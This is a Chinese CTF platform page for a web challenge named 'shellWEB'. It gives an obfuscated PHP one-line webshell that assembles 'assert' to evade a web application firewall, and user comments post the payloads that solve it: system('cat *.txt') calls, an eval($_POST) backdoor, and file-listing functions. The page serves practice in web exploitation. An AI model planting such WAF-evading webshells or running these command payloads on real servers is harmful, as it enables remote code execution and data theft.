shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 4942
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
eleven 3年前
举报

?s=system("cat *.txt")

回复 0
naihe567 3年前
举报

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1
mantou 3年前
举报

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0
Y1rannn 3年前
举报

...没那么复杂啊,我直接s=system("")

回复 3
pest 3年前
举报

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0
simpleboy 3年前
举报

解法还是很多的

回复 0
simpleboy 3年前
举报

命令执行了

回复 0
三分踯躅 3年前
举报

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0
GGBond9527 3年前
举报

assert()代码执行漏洞

回复 1
xiaotan451 3年前
举报

我是肖彪

回复 3
xiaotan451 3年前
举报

@biaoxiao 我是流汗了

回复 0
biaoxiao 3年前
举报

嗯 你说得对

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(6)

解题动态

LCY2117 攻破了该题 9分钟前
yixcjy 攻破了该题 2小时前
feifeifei1212 攻破了该题 4小时前
17530626785 攻破了该题 6小时前
DURUI 攻破了该题 7小时前
ntyz1919810 攻破了该题 1天前
懒大王念你 攻破了该题 1天前
jqr0630 攻破了该题 1天前
nbufe123 攻破了该题 1天前
dgreawSFD 攻破了该题 1天前
24030111073 攻破了该题 2天前
reaquedaue 攻破了该题 2天前
mffl 攻破了该题 2天前
0x2d3CN 攻破了该题 2天前
1870006529 攻破了该题 3天前
Xlj15562926857 攻破了该题 3天前
z19708684985 攻破了该题 3天前
当心眼睛 攻破了该题 3天前
ttmtmy01 攻破了该题 3天前
Gyro 攻破了该题 3天前
问题反馈